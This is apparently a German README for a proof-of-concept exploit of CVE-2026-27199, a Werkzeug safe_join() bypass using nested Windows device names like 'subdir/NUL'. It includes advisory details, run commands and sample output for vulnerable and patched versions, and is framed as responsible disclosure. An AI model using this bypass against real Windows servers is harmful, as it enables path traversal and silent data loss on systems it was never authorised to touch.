
Proof-of-Concept-Exploit für CVE-2026-27199, einen Werkzeug-safe_join()-Bypass für Windows-Gerätenamen, der Pfad-Traversal und stilles Verwerfen von Daten demonstriert.
safe_join() Windows-Gerätenamen-BypassStatus: Öffentlich offengelegt. Behoben in werkzeug 3.1.6.
Schweregrad: Mittel
Melder: @alimezar
Advisory: GHSA-29vq-49wr-vm6x
| Paket | Betroffen | Behoben |
|---|
| werkzeug | < 3.1.6 | 3.1.6 |
Erfordert: Windows, Python 3.8+,
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (korrekt blockiert)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (Bypass!)
[*] Versuche, in den zurückgegebenen Pfad zu schreiben ...
[!] open(verschachteltes NUL) write: ERFOLG — Daten stillschweigend vom Gerät verworfen
[!] VERWUNDBAR: CVE-2026-27199 auf dieser Installation bestätigt.
Upgrade auf werkzeug >= 3.1.6 zur Behebung durchführen.
[+] safe_join(base, 'subdir/NUL') -> None (korrekt blockiert)
[+] NICHT VERWUNDBAR: Verschachtelter Gerätename wurde blockiert.
Dieses PoC wird zu Bildungs- und Verteidigungszwecken veröffentlicht, nach verantwortungsvoller Offenlegung und öffentlicher Verfügbarkeit des Patches.